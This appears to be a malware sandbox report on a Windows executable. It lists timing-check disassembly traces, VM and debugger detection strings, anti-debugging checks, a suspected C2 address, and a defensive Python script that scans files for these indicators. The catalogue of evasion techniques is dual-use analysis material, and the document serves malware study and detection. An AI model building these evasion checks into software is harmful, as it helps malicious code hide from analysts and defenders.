Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60E1A second address: 6F60E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60E1E second address: 6F60E3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60EEB second address: 6F60F08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60F08 second address: 6F60F0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60F0E second address: 6F60FAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, esi 0x0000000d jmp 00007FDC00CE27B6h 0x00000012 mov dword ptr [esi+0Ch], eax 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FDC00CE27AEh 0x0000001c sbb eax, 38079028h 0x00000022 jmp 00007FDC00CE27ABh 0x00000027 popfd 0x00000028 call 00007FDC00CE27B8h 0x0000002d mov ebx, ecx 0x0000002f pop ecx 0x00000030 popad 0x00000031 mov edx, 775606ECh 0x00000036 pushad 0x00000037 push edi 0x00000038 mov edi, eax 0x0000003a pop ecx 0x0000003b mov dx, 36F6h 0x0000003f popad 0x00000040 mov eax, 00000000h 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FDC00CE27B9h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60FAF second address: 6F60FF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007FDC0050BD4Dh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e lock cmpxchg dword ptr [edx], ecx 0x00000012 jmp 00007FDC0050BD57h 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FDC0050BD50h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60FF5 second address: 6F61004 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F61004 second address: 6F610DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDC0050BD4Bh 0x00000009 adc esi, 1F2AB79Eh 0x0000000f jmp 00007FDC0050BD59h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 test eax, eax 0x0000001a pushad 0x0000001b pushad 0x0000001c mov di, cx 0x0000001f pushfd 0x00000020 jmp 00007FDC0050BD56h 0x00000025 jmp 00007FDC0050BD55h 0x0000002a popfd 0x0000002b popad 0x0000002c movzx esi, bx 0x0000002f popad 0x00000030 jne 00007FDC70A8A3B3h 0x00000036 pushad 0x00000037 call 00007FDC0050BD59h 0x0000003c push esi 0x0000003d pop ebx 0x0000003e pop esi 0x0000003f push ebx 0x00000040 mov edi, esi 0x00000042 pop esi 0x00000043 popad 0x00000044 mov edx, dword ptr [ebp+08h] 0x00000047 jmp 00007FDC0050BD4Bh 0x0000004c mov eax, dword ptr [esi] 0x0000004e pushad 0x0000004f pushfd 0x00000050 jmp 00007FDC0050BD4Bh 0x00000055 sbb esi, 733E59CEh 0x0000005b jmp 00007FDC0050BD59h 0x00000060 popfd 0x00000061 popad 0x00000062 mov dword ptr [edx], eax 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 mov bh, D7h 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F610DD second address: 6F61177 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDC00CE27AEh 0x00000009 sbb eax, 19F59578h 0x0000000f jmp 00007FDC00CE27ABh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FDC00CE27B8h 0x0000001b xor ch, FFFFFFD8h 0x0000001e jmp 00007FDC00CE27ABh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 mov eax, dword ptr [esi+04h] 0x0000002a jmp 00007FDC00CE27B6h 0x0000002f mov dword ptr [edx+04h], eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FDC00CE27ADh 0x0000003b xor eax, 1CF41A26h 0x00000041 jmp 00007FDC00CE27B1h 0x00000046 popfd 0x00000047 mov ecx, 73C43757h 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F61177 second address: 6F6117C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F6117C second address: 6F611D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, 95DCh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+08h] 0x0000000e jmp 00007FDC00CE27ABh 0x00000013 mov dword ptr [edx+08h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov ax, bx 0x0000001c pushfd 0x0000001d jmp 00007FDC00CE27B7h 0x00000022 sbb esi, 7CE722BEh 0x00000028 jmp 00007FDC00CE27B9h 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F611D7 second address: 6F61271 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+0Ch] 0x0000000c pushad 0x0000000d mov bx, ax 0x00000010 mov ebx, ecx 0x00000012 popad 0x00000013 mov dword ptr [edx+0Ch], eax 0x00000016 pushad 0x00000017 jmp 00007FDC0050BD50h 0x0000001c pushfd 0x0000001d jmp 00007FDC0050BD52h 0x00000022 add ch, 00000048h 0x00000025 jmp 00007FDC0050BD4Bh 0x0000002a popfd 0x0000002b popad 0x0000002c mov eax, dword ptr [esi+10h] 0x0000002f pushad 0x00000030 movsx edx, cx 0x00000033 popad 0x00000034 mov dword ptr [edx+10h], eax 0x00000037 jmp 00007FDC0050BD4Ah 0x0000003c mov eax, dword ptr [esi+14h] 0x0000003f jmp 00007FDC0050BD50h 0x00000044 mov dword ptr [edx+14h], eax 0x00000047 jmp 00007FDC0050BD50h 0x0000004c mov eax, dword ptr [esi+18h] 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F61271 second address: 6F61275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F61275 second address: 6F6127B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F6127B second address: 6F612BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDC00CE27B2h 0x00000009 sbb si, B468h 0x0000000e jmp 00007FDC00CE27ABh 0x00000013 popfd 0x00000014 movzx ecx, di 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [edx+18h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FDC00CE27AEh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F612BB second address: 6F612C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F612C2 second address: 6F612F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esi+1Ch] 0x0000000a jmp 00007FDC00CE27B9h 0x0000000f mov dword ptr [edx+1Ch], eax 0x00000012 pushad 0x00000013 mov si, 88C3h 0x00000017 push eax 0x00000018 push edx 0x00000019 mov edi, eax 0x0000001b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F612F1 second address: 6F61300 instructions: 0x00000000 rdtsc 0x00000002 mov ah, 41h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esi+20h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F61300 second address: 6F61307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov al, FBh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F61307 second address: 6F6130D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F6130D second address: 6F61311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F61311 second address: 6F61315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F61315 second address: 6F61396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+20h], eax 0x0000000b jmp 00007FDC00CE27B4h 0x00000010 mov eax, dword ptr [esi+24h] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FDC00CE27AEh 0x0000001a adc cl, 00000018h 0x0000001d jmp 00007FDC00CE27ABh 0x00000022 popfd 0x00000023 mov cx, 70CFh 0x00000027 popad 0x00000028 mov dword ptr [edx+24h], eax 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FDC00CE27B0h 0x00000032 sub si, BB78h 0x00000037 jmp 00007FDC00CE27ABh 0x0000003c popfd 0x0000003d push eax 0x0000003e movsx ebx, ax 0x00000041 pop ecx 0x00000042 popad 0x00000043 mov eax, dword ptr [esi+28h] 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FDC00CE27AAh 0x0000004d rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F61396 second address: 6F613F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, F784h 0x00000007 push edi 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [edx+28h], eax 0x0000000f pushad 0x00000010 mov cx, dx 0x00000013 pushfd 0x00000014 jmp 00007FDC0050BD51h 0x00000019 or esi, 64227D76h 0x0000001f jmp 00007FDC0050BD51h 0x00000024 popfd 0x00000025 popad 0x00000026 mov ecx, dword ptr [esi+2Ch] 0x00000029 pushad 0x0000002a mov dh, 1Dh 0x0000002c popad 0x0000002d mov dword ptr [edx+2Ch], ecx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FDC0050BD51h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F613F1 second address: 6F613F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F613F7 second address: 6F613FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F613FB second address: 6F61421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [esi+30h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov cx, bx 0x00000015 push edx 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F61421 second address: 6F61447 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+30h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F61447 second address: 6F6144B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F6144B second address: 6F61451 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F61451 second address: 6F61457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F61573 second address: 6F61578 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F61578 second address: 6F6159C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx ebx, si 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDC00CE27B7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F6159C second address: 6F615A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, B0h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F615A3 second address: 6F615E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebx 0x00000008 jmp 00007FDC00CE27ACh 0x0000000d leave 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movsx ebx, si 0x00000014 pushfd 0x00000015 jmp 00007FDC00CE27B6h 0x0000001a add cx, E178h 0x0000001f jmp 00007FDC00CE27ABh 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F615E7 second address: 6F615FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDC0050BD54h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6FB0DCE second address: 6FB0DE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDC00CE27AEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6FB0DE0 second address: 6FB0DE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F5088A second address: 6F50892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F50892 second address: 6F508B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 jmp 00007FDC0050BD54h 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F508B6 second address: 6F508BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSpecial instruction interceptor: First address: 8D9923 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSpecial instruction interceptor: First address: 8D9A12 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSpecial instruction interceptor: First address: A81DEA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSpecial instruction interceptor: First address: B10F51 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_001D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_001D255D
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_001D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_001D29FF
Source: joE9s9sbv0.exe, joE9s9sbv0.exe, 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: joE9s9sbv0.exe | Binary or memory string: Hyper-V RAW
Source: joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: joE9s9sbv0.exe, 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: joE9s9sbv0.exe, 00000000.00000003.1653214748.00000000014CD000.00000004.00000020.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000003.1653452383.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000003.1653322641.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1685319789.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000003.1653681203.00000000014DD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"index": 2 }, { "app_name": "Microsoft Edge WebView2 Runtime", "index": 3 }, { "app_name": "Java Auto Updater", "index": 4 }, { "app_name": "Java 8 Update 381", "index": 5 }, { "app_name": "Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532", "index": 6 }, { "app_name": "Office 16 Click-to-Run Extensibility Component", "index": 7 }, { "app_name": "Google Chrome", "index": 8 }, { "app_name": "Microsoft Edge", "index": 9 }, { "app_name":
Source: joE9s9sbv0.exe, 00000000.00000003.1565528772.0000000001472000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!!
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | File opened: NTICE
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | File opened: SICE
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Process queried: DebugPort (3 occurrences)
Source: joE9s9sbv0.exe, joE9s9sbv0.exe, 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: DProgram Manager
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation (4 occurrences)
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: procmon.exe
Source: joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: wireshark.exe
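The two evidence blocks above (VM and sandbox fingerprinting through the DriverDesc, SystemBiosVersion and VideoBiosVersion registry values and the VirtualBox and Hyper-V strings, then the anti-debugging checks: ThreadHideFromDebugger, ProcessDebugPort, the SoftICE device names NTICE/SICE/SIWVID and the OllyDbg and Sysinternals window classes) are the artefacts worth confirming statically in related files before they are detonated. The Oreans.vxd and Software\WinLicense strings, together with the .taggant entry-point section in the static information further down, point to the Oreans WinLicense/Themida protector, whose stock checks include the SoftICE device probes, the debugger window-name lookups and the RDTSC timing loops traced above; the tool names that sit next to the JSON keys vbox_first, vbox_second, public_check, dbg, dbg_sec and dbg_third (WINDBG.EXE, wireshark.exe, procmon.exe, x64dbg.exe, ida.exe) belong to the payload's own host fingerprint, which it reports to the C2. That split between protector and payload is an inference from the strings, not a finding of the report. The Python below is an added example written for this corpus, not code from the report or from the sample: it searches a buffer for the indicator strings listed above in both ASCII and UTF-16LE and groups the hits by technique. The category names and the SAMPLE buffer are constructed for the example.

```python
"""Static triage for the anti-analysis artefacts listed in this report.

Added example for this corpus, not code from the Joe Sandbox report or
from the sample. It searches a binary's bytes for the strings the report
attributes to the sample and groups the hits by technique, so a related
file can be checked for the same checks without running it.
"""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Indicator strings copied from the report's evidence lines. The category
# names are ours; "bios_values" also covers the Hyper-V RAW string.
INDICATORS = {
    "window_names": [  # FindWindow targets: debuggers and Sysinternals monitors
        b"ollydbg", b"regmonclass", b"filemonclass", b"procmon_window_class",
        b"gbdyllo", b"process monitor - sysinternals",
        b"registry monitor - sysinternals", b"file monitor - sysinternals",
    ],
    "softice_devices": [b"NTICE", b"SICE", b"SIWVID"],  # opened as \\.\NAME
    "vbox_paths": [
        b"HARDWARE\\ACPI\\DSDT\\VBOX__",
        b"SYSTEM\\ControlSet001\\Services\\VBoxSF",
        b"VBox*.dll",
    ],
    "tool_processes": [b"procmon.exe", b"wireshark.exe", b"x64dbg.exe",
                       b"ida.exe", b"WINDBG.EXE"],
    "bios_values": [b"SystemBiosVersion", b"VideoBiosVersion", b"Hyper-V RAW"],
}


def _patterns(indicator: bytes):
    """Compile the narrow (ASCII) and wide (UTF-16LE) forms of an indicator.

    The ASCII form is bounded so that short tokens such as SICE do not fire
    inside ordinary words; Windows binaries keep many of these strings as
    UTF-16LE, so that encoding is searched as well.
    """
    narrow = rb"(?<![A-Za-z0-9])" + re.escape(indicator) + rb"(?![A-Za-z0-9])"
    wide = re.escape(indicator.decode("ascii").encode("utf-16le"))
    return [(re.compile(narrow, re.IGNORECASE), "ascii"),
            (re.compile(wide, re.IGNORECASE), "utf-16le")]


def scan(data: bytes) -> Dict[str, List[Tuple[int, str, str]]]:
    """Return {category: [(offset, encoding, indicator), ...]} for every hit."""
    hits = defaultdict(list)
    for category, indicators in INDICATORS.items():
        for indicator in indicators:
            for pattern, encoding in _patterns(indicator):
                for match in pattern.finditer(data):
                    hits[category].append(
                        (match.start(), encoding, indicator.decode("ascii")))
    return dict(hits)


def triage(data: bytes) -> Tuple[int, List[str]]:
    """Summarise a scan as (number of technique categories hit, their names)."""
    hits = scan(data)
    return len(hits), sorted(hits)


# Constructed stand-in for a file: a few of the report's strings in both
# encodings plus a decoy word containing "sice" that must not match.
SAMPLE = (
    b"\x00" * 16
    + b"OLLYDBG\x00procmon_window_class\x00"
    + b"\\\\.\\SICE\x00\\\\.\\NTICE\x00"
    + b"HARDWARE\\ACPI\\DSDT\\VBOX__\x00"
    + "wireshark.exe".encode("utf-16le")
    + b"\x00basicexample\x00"
)

if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    for category, found in sorted(scan(blob).items()):
        for offset, encoding, indicator in found:
            print(f"{category:16} {offset:#010x} {encoding:8} {indicator}")
    print("categories hit:", triage(blob)[0])
```

Run it with a file path to scan a real sample; with no argument it scans the constructed buffer. Hits in the protector's categories alone (SoftICE devices, window names) say little about the payload; the tool-process and VirtualBox-path strings next to the JSON keys are what tie a new file to this family's fingerprint routine.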

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.10:49705 -> 176.53.146.223:80
